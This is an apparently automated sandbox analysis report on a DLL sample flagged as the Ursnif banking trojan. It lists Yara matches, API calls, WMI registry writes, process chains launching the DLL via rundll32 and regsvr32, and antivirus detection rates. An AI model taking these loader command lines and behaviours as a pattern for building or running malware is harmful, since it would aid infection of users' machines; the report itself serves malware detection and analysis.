Source: Yara match	File source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3160, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.bb8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.6b8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ff8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32c8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_00FC35A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		2_2_00A735A1

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: a04.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E052264	0_2_6E052264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC6609	0_2_00FC6609
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC7FA8	0_2_00FC7FA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E05F843	0_2_6E05F843
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E062CEF	0_2_6E062CEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E065F70	0_2_6E065F70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0645F7	0_2_6E0645F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E052264	2_2_6E052264
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A76609	2_2_00A76609
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A77FA8	2_2_00A77FA8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E05F843	2_2_6E05F843
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E062CEF	2_2_6E062CEF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E065F70	2_2_6E065F70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E0645F7	2_2_6E0645F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E05F843	3_2_6E05F843
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E062CEF	3_2_6E062CEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E065F70	3_2_6E065F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E0645F7	3_2_6E0645F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E05F843	5_2_6E05F843
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E062CEF	5_2_6E062CEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E065F70	5_2_6E065F70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E0645F7	5_2_6E0645F7

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E051B89 NtMapViewOfSection,	0_2_6E051B89
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E0518D1 GetProcAddress,NtCreateSection,memset,	0_2_6E0518D1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E052485 NtQueryVirtualMemory,	0_2_6E052485
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00FC3CA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC81CD NtQueryVirtualMemory,	0_2_00FC81CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E051B89 NtMapViewOfSection,	2_2_6E051B89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E0518D1 GetProcAddress,NtCreateSection,memset,	2_2_6E0518D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E052485 NtQueryVirtualMemory,	2_2_6E052485
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A73CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_00A73CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A781CD NtQueryVirtualMemory,	2_2_00A781CD

Source: a04.dll

Binary or memory string: OriginalFilenamevsmsoui.dll^ vs a04.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: a04.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: a04.dll	Virustotal: Detection: 59%
Source: a04.dll	Metadefender: Detection: 17%
Source: a04.dll	ReversingLabs: Detection: 71%

Source: a04.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\a04.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\a04.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\a04.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AE6AEE69-2775-11EC-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD54DA9B6AE4A4ED1.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.winDLL@21/140@24/13

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FC19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00FC19E7

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: a04.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: a04.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: a04.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: a04.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: a04.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: a04.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: a04.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: a04.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\Month\quick-major\729\Key\key.pdb source: rundll32.exe, a04.dll

Source: a04.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: a04.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: a04.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: a04.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: a04.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E052200 push ecx; ret	0_2_6E052209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E052253 push ecx; ret	0_2_6E052263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FCB67C push ss; retf	0_2_00FCB690
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC7C20 push ecx; ret	0_2_00FC7C29
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC7F97 push ecx; ret	0_2_00FC7FA7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FCB163 push edx; iretd	0_2_00FCB164
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E069697 push ecx; ret	0_2_6E069698
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E067D4A push ebp; iretd	0_2_6E067D4D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E052200 push ecx; ret	2_2_6E052209
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E052253 push ecx; ret	2_2_6E052263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A77C20 push ecx; ret	2_2_00A77C29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A7B67C push ss; retf	2_2_00A7B690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A77F97 push ecx; ret	2_2_00A77FA7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A7B163 push edx; iretd	2_2_00A7B164
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E069697 push ecx; ret	2_2_6E069698
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E067D4A push ebp; iretd	2_2_6E067D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E069697 push ecx; ret	3_2_6E069698
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E067D4A push ebp; iretd	3_2_6E067D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E069697 push ecx; ret	5_2_6E069698
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E067D4A push ebp; iretd	5_2_6E067D4D

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E051F31 LoadLibraryA,GetProcAddress,

0_2_6E051F31

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\a04.dll

Source: initial sample

Static PE information: section name: .text entropy: 6.83409400376

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3160, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.bb8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e050000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.6b8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4cb94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ff8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.50d94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32c8d06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

